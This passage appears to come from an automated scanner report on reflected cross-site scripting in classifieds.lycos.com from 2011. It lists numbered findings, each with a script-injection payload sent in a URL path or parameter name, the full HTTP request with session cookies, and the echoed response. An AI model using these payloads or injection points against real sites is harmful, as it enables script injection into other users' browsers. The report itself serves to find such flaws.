GET /sale-tickets-group-class_workshop9ac20"><script>alert(1)</script>238d92d6570/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:23 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-class_workshop9ac20"><script>alert(1)</script>238d92d6570/?mobile=1" rel="nofollow"> ...[SNIP]...
1.158. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets-group-class_workshop/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5dd4"><script>alert(1)</script>656971876a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-group-class_workshop/?d5dd4"><script>alert(1)</script>656971876a5=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-class_workshop/?d5dd4"><script>alert(1)</script>656971876a5=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e81"><script>alert(1)</script>8d746e274cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-group-festival35e81"><script>alert(1)</script>8d746e274cc/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:19 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-festival35e81"><script>alert(1)</script>8d746e274cc/?mobile=1" rel="nofollow"> ...[SNIP]...
1.160. http://classifieds.lycos.com/sale-tickets-group-festival/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets-group-festival/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31701"><script>alert(1)</script>f313045580 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-group-festival/?31701"><script>alert(1)</script>f313045580=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-festival/?31701"><script>alert(1)</script>f313045580=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95ba7"><script>alert(1)</script>680b206d4c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-group-food_wine95ba7"><script>alert(1)</script>680b206d4c7/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:13 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-food_wine95ba7"><script>alert(1)</script>680b206d4c7/?mobile=1" rel="nofollow"> ...[SNIP]...
1.162. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets-group-food_wine/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 603fa"><script>alert(1)</script>163ed63fbc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-group-food_wine/?603fa"><script>alert(1)</script>163ed63fbc6=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25919
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-food_wine/?603fa"><script>alert(1)</script>163ed63fbc6=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d916"><script>alert(1)</script>dba79779e48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-group-kids_family8d916"><script>alert(1)</script>dba79779e48/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-kids_family8d916"><script>alert(1)</script>dba79779e48/?mobile=1" rel="nofollow"> ...[SNIP]...
1.164. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets-group-kids_family/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8225"><script>alert(1)</script>9121761921e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-group-kids_family/?b8225"><script>alert(1)</script>9121761921e=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:19:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40071
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-group-kids_family/?b8225"><script>alert(1)</script>9121761921e=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c609a"><script>alert(1)</script>d802a3c643d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-sportsc609a"><script>alert(1)</script>d802a3c643d/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:32 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-sportsc609a"><script>alert(1)</script>d802a3c643d/?mobile=1" rel="nofollow"> ...[SNIP]...
1.166. http://classifieds.lycos.com/sale-tickets-sports/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets-sports/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c809"><script>alert(1)</script>a13e3fef637 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-sports/?5c809"><script>alert(1)</script>a13e3fef637=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:48 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-sports/?5c809"><script>alert(1)</script>a13e3fef637=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939ca"><script>alert(1)</script>a0a874e0f75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-theater939ca"><script>alert(1)</script>a0a874e0f75/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-theater939ca"><script>alert(1)</script>a0a874e0f75/?mobile=1" rel="nofollow"> ...[SNIP]...
1.168. http://classifieds.lycos.com/sale-tickets-theater/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets-theater/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df2c3"><script>alert(1)</script>40ff8ae0192 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-theater/?df2c3"><script>alert(1)</script>40ff8ae0192=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 52112
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-theater/?df2c3"><script>alert(1)</script>40ff8ae0192=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc66d"><script>alert(1)</script>e63e7d3e623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-ticketsbc66d"><script>alert(1)</script>e63e7d3e623/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:19 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-ticketsbc66d"><script>alert(1)</script>e63e7d3e623/?mobile=1" rel="nofollow"> ...[SNIP]...
1.170. http://classifieds.lycos.com/sale-tickets/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4d61"><script>alert(1)</script>4c23c20c7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets/?d4d61"><script>alert(1)</script>4c23c20c7a3=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets/?d4d61"><script>alert(1)</script>4c23c20c7a3=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fcc"><script>alert(1)</script>58b5ed170cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-toy27fcc"><script>alert(1)</script>58b5ed170cf/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:48 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-toy27fcc"><script>alert(1)</script>58b5ed170cf/?mobile=1" rel="nofollow"> ...[SNIP]...
1.172. http://classifieds.lycos.com/sale-toy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-toy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0d7"><script>alert(1)</script>352dfe6081b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-toy/?1d0d7"><script>alert(1)</script>352dfe6081b=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-toy/?1d0d7"><script>alert(1)</script>352dfe6081b=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca0c4"><script>alert(1)</script>f5884d558bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
